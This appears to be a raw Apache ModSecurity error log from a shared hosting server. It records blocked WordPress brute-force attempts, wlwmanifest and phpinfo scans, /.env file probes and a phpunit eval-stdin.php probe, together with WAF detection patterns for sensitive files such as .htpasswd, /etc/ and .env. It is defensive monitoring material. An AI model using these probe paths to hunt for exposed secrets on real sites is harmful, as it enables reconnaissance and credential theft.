[Tue May 26 18:33:45.151229 2026] [security2:error] [pid 1007701:tid 1007861] [client 45.154.98.214:56645] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/web/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMQ05qHzKMxj0enGhHQAAAKM"]
[Tue May 26 18:33:45.474329 2026] [security2:error] [pid 998632:tid 998889] [client 45.154.98.214:49825] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/wordpress/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMa1OTU2dW0MS1EnOKwAAAFw"]
[Tue May 26 18:33:45.642646 2026] [security2:error] [pid 1007701:tid 1007885] [client 124.43.5.103:15967] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaMQ05qHzKMxj0enGhJgAAALs"]
[Tue May 26 18:33:45.642789 2026] [security2:error] [pid 1007701:tid 1007885] [client 124.43.5.103:15967] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaMQ05qHzKMxj0enGhJgAAALs"]
[Tue May 26 18:33:45.719749 2026] [security2:error] [pid 998632:tid 998886] [client 57.141.2.55:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaMa1OTU2dW0MS1EnOKgAAAFk"]
[Tue May 26 18:33:45.772176 2026] [security2:error] [pid 1007701:tid 1007940] [client 45.154.98.214:60708] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/website/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMQ05qHzKMxj0enGhJwAAAPI"]
[Tue May 26 18:33:46.132943 2026] [security2:error] [pid 998632:tid 998838] [client 45.154.98.214:59810] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/news/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMq1OTU2dW0MS1EnOMAAAACw"]
[Tue May 26 18:33:46.343612 2026] [security2:error] [pid 998632:tid 998730] [remote 18.190.7.192:34688] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 192.7.190.18.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWaMq1OTU2dW0MS1EnOLwAAako"]
[Tue May 26 18:33:46.489901 2026] [security2:error] [pid 998632:tid 998858] [client 45.154.98.214:57607] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/2019/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMq1OTU2dW0MS1EnONAAAAEA"]
[Tue May 26 18:33:46.829634 2026] [security2:error] [pid 998632:tid 998841] [client 45.154.98.214:64144] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/wp1/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMq1OTU2dW0MS1EnOOQAAAC8"]
[Tue May 26 18:33:47.214548 2026] [security2:error] [pid 998632:tid 998796] [client 45.154.98.214:50560] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/media/wp-includes/wlwmanifest.xml"] [unique_id "ahWaM61OTU2dW0MS1EnOPAAAAAU"]
[Tue May 26 18:33:47.515694 2026] [autoindex:error] [pid 998632:tid 998871] [client 162.62.213.165:59176] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:33:47.522671 2026] [security2:error] [pid 998632:tid 998908] [client 45.154.98.214:55201] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/wp2/wp-includes/wlwmanifest.xml"] [unique_id "ahWaM61OTU2dW0MS1EnOPwAAAG8"]
[Tue May 26 18:33:47.833423 2026] [security2:error] [pid 1007701:tid 1007957] [client 45.154.98.214:54778] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/site/wp-includes/wlwmanifest.xml"] [unique_id "ahWaMw05qHzKMxj0enGhNQAAAQM"]
[Tue May 26 18:33:47.959994 2026] [security2:error] [pid 998632:tid 998750] [remote 157.42.20.70:40268] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahWaM61OTU2dW0MS1EnOSgAARV4"]
[Tue May 26 18:33:47.974205 2026] [security2:error] [pid 1007701:tid 1007867] [client 157.42.20.70:0] ModSecurity: Warning. Pattern match "/(contact(o|.?us)?|wp-comments-post|(send)?.?(form.)?e?mail(er)?|memberlist|send|contact.form(.handler)?|thankyou|leafmailer[0-9.]*)\\\\.php" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1546"] [id "900923"] [msg "contact form logging"] [hostname "samayikprasanga.in"] [uri "/contact.php"] [unique_id "ahWaMw05qHzKMxj0enGhNwAAAKk"]
[Tue May 26 18:33:48.137163 2026] [security2:error] [pid 1007701:tid 1007893] [client 45.154.98.214:59907] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/cms/wp-includes/wlwmanifest.xml"] [unique_id "ahWaNA05qHzKMxj0enGhOAAAAMM"]
[Tue May 26 18:33:48.345011 2026] [security2:error] [pid 998632:tid 998829] [client 57.141.2.48:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaM61OTU2dW0MS1EnOSQAAACU"]
[Tue May 26 18:33:48.446953 2026] [security2:error] [pid 1007701:tid 1007847] [client 45.154.98.214:52731] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-includes/wlwmanifest\\\\.xml" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1541"] [id "900920"] [msg "wlwmanifest spam rule"] [hostname "blackboxalgo.in"] [uri "/sito/wp-includes/wlwmanifest.xml"] [unique_id "ahWaNA05qHzKMxj0enGhOgAAAJU"]
[Tue May 26 18:33:48.977028 2026] [security2:error] [pid 1007701:tid 1007833] [client 47.128.97.202:59488] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "agsnails.com"] [uri "/robots.txt"] [unique_id "ahWaNA05qHzKMxj0enGhQQAAAIc"]
[Tue May 26 18:33:50.449360 2026] [security2:error] [pid 998632:tid 998816] [client 41.10.217.183:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaNa1OTU2dW0MS1EnOZAAAABk"]
[Tue May 26 18:33:50.577482 2026] [security2:error] [pid 998632:tid 998834] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaNq1OTU2dW0MS1EnOZgAAACk"]
[Tue May 26 18:33:53.856748 2026] [security2:error] [pid 998632:tid 998795] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaOa1OTU2dW0MS1EnOiAAAAAQ"]
[Tue May 26 18:33:54.020869 2026] [security2:error] [pid 1007701:tid 1007840] [client 103.67.163.30:59583] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahWaOg05qHzKMxj0enGhagAAAI4"]
[Tue May 26 18:33:55.713070 2026] [security2:error] [pid 1007701:tid 1007938] [client 103.67.163.30:60169] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "worldwidecourier.co.in"] [uri "/.env"] [unique_id "ahWaOw05qHzKMxj0enGhdgAAAPA"]
[Tue May 26 18:33:56.322994 2026] [security2:error] [pid 998632:tid 998897] [client 124.43.5.103:53622] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaPK1OTU2dW0MS1EnOqQAAAGQ"]
[Tue May 26 18:33:56.323209 2026] [security2:error] [pid 998632:tid 998897] [client 124.43.5.103:53622] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaPK1OTU2dW0MS1EnOqQAAAGQ"]
[Tue May 26 18:33:56.378278 2026] [security2:error] [pid 1007701:tid 1007950] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaOw05qHzKMxj0enGheAAAAPw"]
[Tue May 26 18:33:57.545847 2026] [security2:error] [pid 1007701:tid 1007768] [remote 94.76.235.103:54192] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.235.76.94.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "kingsclubmembership.com"] [uri "/wp-login.php"] [unique_id "ahWaPQ05qHzKMxj0enGhhwAAv0I"]
[Tue May 26 18:33:57.920158 2026] [security2:error] [pid 1007701:tid 1007879] [client 103.67.163.30:60127] ModSecurity: Access denied with code 406 (phase 1). Match of "rx ^0$" against "REQUEST_HEADERS:Content-Length" required. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "96"] [id "392301"] [rev "7"] [msg "Atomicorp.com WAF Rules: Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [tag "no_ar"] [hostname "worldwidecourier.co.in"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ahWaPQ05qHzKMxj0enGhkQAAALU"]
[Tue May 26 18:33:59.093914 2026] [security2:error] [pid 998632:tid 998855] [client 57.141.2.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaPq1OTU2dW0MS1EnOsgAAAD0"]
[Tue May 26 18:34:00.196737 2026] [security2:error] [pid 998632:tid 998847] [client 114.119.134.123:30531] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.siliconelevators.in"] [uri "/images/siliconelevators-lifts-automaticdoor.jpg"] [unique_id "ahWaQK1OTU2dW0MS1EnOxAAAADU"], referer: https://www.siliconelevators.in/siliconelevators-products.php
[Tue May 26 18:34:00.406972 2026] [autoindex:error] [pid 1007701:tid 1007910] [client 43.165.174.53:36700] AH01276: Cannot serve directory /home2/restmwhm/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 18:34:01.581222 2026] [security2:error] [pid 998632:tid 998735] [remote 121.200.216.55:55324] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWaQa1OTU2dW0MS1EnO1AAAZ08"]
[Tue May 26 18:34:02.172640 2026] [security2:error] [pid 1007701:tid 1007912] [client 57.141.2.32:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaQQ05qHzKMxj0enGhuwAAANY"]
[Tue May 26 18:34:03.884522 2026] [security2:error] [pid 998632:tid 998837] [client 185.191.171.14:37110] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/list/"] [unique_id "ahWaQ61OTU2dW0MS1EnO7wAAACs"]
[Tue May 26 18:34:03.884620 2026] [security2:error] [pid 998632:tid 998837] [client 185.191.171.14:37110] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/tag/june-16-20/list/"] [unique_id "ahWaQ61OTU2dW0MS1EnO7wAAACs"]
[Tue May 26 18:34:04.292896 2026] [security2:error] [pid 998632:tid 998856] [client 208.91.198.85:28088] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "rehobothindependentcare.com"] [uri "/wp-cron.php"] [unique_id "ahWaQ61OTU2dW0MS1EnO7QAAAD4"]
[Tue May 26 18:34:05.387874 2026] [security2:error] [pid 998632:tid 998923] [client 57.141.2.60:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaRK1OTU2dW0MS1EnO9wAAAH4"]
[Tue May 26 18:34:06.015013 2026] [security2:error] [pid 998632:tid 998797] [client 207.174.214.47:24224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "friendsalongtheway.net"] [uri "/wp-cron.php"] [unique_id "ahWaRq1OTU2dW0MS1EnPAAAAAAY"]
[Tue May 26 18:34:06.020258 2026] [security2:error] [pid 998632:tid 998883] [client 85.11.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWaRK1OTU2dW0MS1EnO9gAAAFc"]
[Tue May 26 18:34:06.271168 2026] [security2:error] [pid 998632:tid 998853] [client 85.11.167.49:61172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/phpinfo.php"] [unique_id "ahWaRq1OTU2dW0MS1EnPAgAAADs"]
[Tue May 26 18:34:06.529094 2026] [security2:error] [pid 998632:tid 998916] [client 85.11.167.49:61958] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/test.php"] [unique_id "ahWaRq1OTU2dW0MS1EnPBwAAAHc"]
[Tue May 26 18:34:06.892468 2026] [security2:error] [pid 1007701:tid 1007804] [remote 141.95.202.18:44720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWaRg05qHzKMxj0enGh4AABA2Y"]
[Tue May 26 18:34:07.200765 2026] [security2:error] [pid 1007701:tid 1007927] [client 124.43.5.103:53908] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 103.5.43.124.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaRw05qHzKMxj0enGh6gAAAOU"]
[Tue May 26 18:34:07.200904 2026] [security2:error] [pid 1007701:tid 1007927] [client 124.43.5.103:53908] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "cicodev.org"] [uri "/xmlrpc.php"] [unique_id "ahWaRw05qHzKMxj0enGh6gAAAOU"]
[Tue May 26 18:34:07.254132 2026] [security2:error] [pid 1007701:tid 1007710] [remote 141.95.202.18:44720] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 18.202.95.141.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWaRw05qHzKMxj0enGh7QAAyQg"], referer: https://filosha.com/wp-login.php
[Tue May 26 18:34:07.289016 2026] [security2:error] [pid 1007701:tid 1007954] [client 85.11.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWaRg05qHzKMxj0enGh5wAAAQA"]
[Tue May 26 18:34:07.564639 2026] [security2:error] [pid 1007701:tid 1007895] [client 85.11.167.49:62023] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/info.php"] [unique_id "ahWaRw05qHzKMxj0enGh8gAAAMU"]
[Tue May 26 18:34:07.827290 2026] [security2:error] [pid 1007701:tid 1007955] [client 85.11.167.49:62412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/php.php"] [unique_id "ahWaRw05qHzKMxj0enGh9AAAAQE"]
[Tue May 26 18:34:07.832857 2026] [security2:error] [pid 1007701:tid 1007939] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaRw05qHzKMxj0enGh7AAAAPE"]
[Tue May 26 18:34:08.089789 2026] [security2:error] [pid 1007701:tid 1007902] [client 85.11.167.49:62504] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/php_info.php"] [unique_id "ahWaSA05qHzKMxj0enGh-QAAAMw"]
[Tue May 26 18:34:08.345978 2026] [security2:error] [pid 1007701:tid 1007839] [client 85.11.167.49:62595] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/i.php"] [unique_id "ahWaSA05qHzKMxj0enGh-wAAAI0"]
[Tue May 26 18:34:08.604566 2026] [security2:error] [pid 998632:tid 998866] [client 85.11.167.49:62708] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/pi.php"] [unique_id "ahWaSK1OTU2dW0MS1EnPFgAAAEg"]
[Tue May 26 18:34:10.071764 2026] [security2:error] [pid 1007701:tid 1007864] [client 85.11.167.49:62781] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/admin/phpinfo.php"] [unique_id "ahWaSg05qHzKMxj0enGiGgAAAKY"]
[Tue May 26 18:34:10.331768 2026] [security2:error] [pid 998632:tid 998849] [client 85.11.167.49:63172] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/pinfo.php"] [unique_id "ahWaSq1OTU2dW0MS1EnPJAAAADc"]
[Tue May 26 18:34:10.475606 2026] [security2:error] [pid 1007701:tid 1007842] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWaSQ05qHzKMxj0enGiGQAAAJA"]
[Tue May 26 18:34:10.590450 2026] [security2:error] [pid 1007701:tid 1007848] [client 85.11.167.49:63244] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 49.167.11.85.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "friendsalongtheway.net"] [uri "/php_version.php"] [unique_id "ahWaSg05qHzKMxj0enGiHgAAAJY"]
[Tue May 26 18:34:11.317654 2026] [security2:error] [pid 1007701:tid 1007868] [client 85.11.167.49:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "friendsalongtheway.net"] [uri "/index.php"] [unique_id "ahWaSg05qHzKMxj0enGiIgAAAKo"]
